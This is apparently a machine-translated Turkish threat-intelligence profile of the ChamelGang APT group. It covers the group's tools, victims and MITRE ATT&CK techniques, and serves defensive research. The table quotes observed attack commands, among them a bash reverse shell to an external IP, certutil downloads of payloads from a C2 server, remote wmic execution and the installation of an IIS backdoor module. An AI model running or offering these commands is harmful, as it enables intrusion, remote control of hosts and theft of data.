Genel açıklama

ChamelGang, en az 2019’dan beri aktif olan bir APT grubudur. Grubun özelliği, kötü amaçlı yazılım ve ağ altyapısının Microsoft, TrendMicro, McAfee, IBM, Google ve diğer şirketlerden yasal hizmetler olarak gizlenmesidir. Araştırdığımız durumlarda, grup ağa iki şekilde sızdı: güvenilir ilişki – grup, alt organizasyonun güvenliğini ihlal etti ve onun aracılığıyla hedef kuruluşun ağına sızdı ve ProxyShell güvenlik açığı zincirini kullanarak Exchange sunucusunun güvenliğini ihlal etti. Grubun diğer bir özelliği, grubun güvenliği ihlal edilmiş bir Exchange veya başka bir IIS sunucusuna bir modül olarak oluşturduğu pasif bir DoorMe arka panelinin kullanılmasıdır.

enstrümanlar

  • kapı beni
  • ProxyT
  • BeaconLoader
  • kobalt grevi
  • FRP
  • küçük kabuk
  • reGeorg

Saldırı altındaki endüstriler

  • havacılık endüstrisi
  • Hükümet sektörü
  • Telekomünikasyon
  • Finans sektörü
  • Enerji

Saldırıya uğrayan ülkeler

  • Afganistan
  • Vietnam
  • Hindistan
  • Litvanya
  • Nepal
  • Rusya
  • Amerika Birleşik Devletleri
  • Tayvan
  • Türkiye
  • Japonya

Positive Technologies ve diğer araştırmacılardan gelen raporlar

Grup tarafından kullanılan MITRE ATT&CK taktikleri

İDİsimTanım
Kaynak geliştirme
T1583.001Etki AlanlarıChamelGang grubu, meşru olanları taklit eden alanlar satın aldı. Örnekler: newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com, centralgoogle.com
T1587.001kötü amaçlı yazılımChamelGang grubu, saldırıyı gerçekleştirmek için kendi kötü amaçlı yazılımını geliştirdi. Örnekler: DoorMe arka kapısı, ProxyTest
T1588.002AletChamelGang, çalışmak için ücretli bir lisans gerektiren halka açık Cobalt Strike aracını kullandı. Örnekler: Filigran – 1936770133
T1588.004Dijital SertifikalarChamelGang, meşru olanları taklit eden kendi SSL sertifikalarını barındırıyordu. Örnekler: github.com, www.ibm.com, jquery.com, update.microsoft-support.net
İlk Erişim
T1199güven ilişkisiChamelGang, bir yan kuruluşla bitişik altyapı aracılığıyla hedef kuruluşa sızdı
T1190Herkese Açık Uygulamadan YararlanmaChamelGang, saldırı altındaki kuruluşun altyapısına bitişik altyapıya erişim sağlamak için herkese açık bir açıktan yararlandı. Örnekler: CVE-2017-12149, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
uygulamak
T1047Windows Yönetim AraçlarıChamelGang, düğümlerde komutları yürütmek için wmic yardımcı programını kullandı. Örnekler: C:\Windows\system32\cmd.exe /C wmic /node:”host” işlem çağrısı oluşturma “c:\windows\system32\cmd.exe /c certutil -urlcache -f -split http://42.99. 116[.]14/ c:\windows\temp\MpKsl15169faf > c:\windows\temp\_1622775917806 2>&1”
T1059.003Windows Komut KabuğuChamelGang, düğümlerde komutları yürütmek için “cmd.exe /c” kabuğunu kullandı. Örnekler: cmd.exe /C hosts.bak c:\windows\system32\drivers\etc\hosts kopyalayın
kalıcılık
T1505.003web kabuğuChamelGang, virüslü ana bilgisayarları yönetmek için yerel bir IIS sunucu modülünün yanı sıra çeşitli web kabukları kullandı. Örnekler: c:\windows\system32\inetsrv\appcmd.exe yükleme modülü /adı:FastCgiModule_en64bit /image:%windir%\System32\inetsrv\iisfcgix64.dll
T1574.001DLL Arama Sırası Ele GeçirmeChamelGang, yükü yürütmek için uygun tekniği kullandı. Örnekler: oci.dll, wlbsctrl.dll
Ayrıcalık Yükseltme
T1068Ayrıcalığın Yükseltilmesi için İstismarChamelGang, erişilebilir düğümlerdeki ayrıcalıkları yükseltmek için açıklardan yararlandı. Örnekler: EternalBlue
Savunmadan Kaçınma
T1036.003Maskeleme: Sistem Yardımcı Programlarını Yeniden AdlandırChamelGang, algılanmayı önlemek için sistem yardımcı programlarının adlarını kopyalayan kötü amaçlı yazılım kullandı. Örnekler: avp.exe, oci.dll, wlbsctrl.dll, modrpflt.dll, protsdown.dll
T1055Proses EnjeksiyonuChamelGang, sistem süreçlerine kötü amaçlı bir yük enjekte eden kötü amaçlı yazılım kullandı
T1070Ana Bilgisayarda Gösterge KaldırmaChamelGang, Tespiti Önlemek İçin Kötü Amaçlı Yazılım Örneklerini Kaldırdı
T1078.003Yerel HesaplarChamelGang, güvenliği ihlal edilmiş ağda gezinmek için yüksek ayrıcalıklara sahip kötü amaçlı yazılım başlatmak için güvenliği ihlal edilmiş yerel yönetici hesaplarını kullandı
T1140Dosyaları veya Bilgileri Gizleme/Kod ÇözmeAna kötü amaçlı yazılım yükü, AES algoritması ile şifrelenir
T1564.001Artifaktları Gizle: Gizli Dosyalar ve DizinlerChamelGang, Unix benzeri sistemlerde gizli dosyalar oluşturdu
T1070.006Ana Bilgisayarda Gösterge Kaldırma: Zaman TokmağıChamelGang grubu, dosya sisteminde kötü amaçlı yazılımların ve yardımcı programların oluşturulma süresini değiştirerek daha erken bir döneme işaret etti.
keşif
T1012Sorgu KaydıChamelGang, Windows kayıt defterini düzenlemek için reg yardımcı programını kullandı. Örnekler: reg sorgusu HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
T1016.001Sistem Ağ Yapılandırması Keşfi: İnternet Bağlantısı KeşfiChamelGang ekibi, internet bağlantısını ve komuta ve kontrol sunucularıyla iletişimi test etmek için curl yardımcı programını kullandı. Örnekler: curl -I -v https://*.*.*.*
T1018Uzaktan Sistem KeşfiChamelGang, ağ keşfi yapmak için nslookup, ping yardımcı programlarını kullandı. Örnekler: nslookup -type=ns kurban.local *.*.*.*, ping -a -n 1 *.*.*.*
T1049Sistem Ağ Bağlantıları KeşfiChamelGang, ağ bağlantılarını kontrol etmek için netstat yardımcı programını kullandı. Örnekler: c:\\windows\\system32\\cmd.exe /c netstat -anop tcp \u003e c:\\windows\\temp\\_1622169989165
T1057Süreç KeşfiChamelGang, işlem bilgilerini almak için görev listesi yardımcı programını kullandı
T1069.001Yerel GruplarChamelGang, kullanıcıları keşfetmek için net grup yardımcı programını kullandı
T1082Sistem Bilgisi KeşfiChamelGang, düğümlerde keşif yapmak için ver, systeminfo yardımcı programlarını kullandı
T1087.001yerel hesapChamelGang, kullanıcıları keşfetmek için net user, quser yardımcı programlarını kullandı
yanal hareket
T1210Uzak Hizmetlerin SömürülmesiChamelGang, güvenliği ihlal edilmiş bir ağdaki diğer sistemlere yana doğru hareket etmek için MS17-010 (EternalBlue) güvenlik açığından yararlandı
Toplamak
T1560Toplanan Verileri ArşivleyinChamelGang grubu, virüslü düğümlerdeki kullanıcı dizinlerinden ilgilenilen türlerdeki dosyaların bir arşivini oluşturmak için bir konsol komutu çalıştırdı. Örnekler: 7z.exe a -padmin -mhe=on -mx9 his.7z geçmiş*.
komuta ve kontrol
T1071Uygulama Katmanı ProtokolüChamelGang, HTTPS Cobalt Strike Beacon’ı ve adlandırılmış kanal sürümünü kullandı
T1090vekilChamelGang, ağ içinde proxy’ler kullandı. Örnekler: FRP, bash -i >& /dev/tcp/115.144.122.8/5555 0>&1.
T1105Giriş Aracı AktarımıChamelGang, certutil yardımcı programını kullanarak C&C sunucusundan ek yardımcı programlar indirdi. Örnekler: certutil -urlcache -f -split http://42.99.116[.]14/.
T1572protokol tünellemeChamelGang, ağ trafiği tünelleme araçlarını kullandı. Örnekler: Neo-reGeorg
sızma
T1041C2 Kanalı Üzerinden SızmaChamelGang, çalınan dosyaları C&C sunucularına yükledi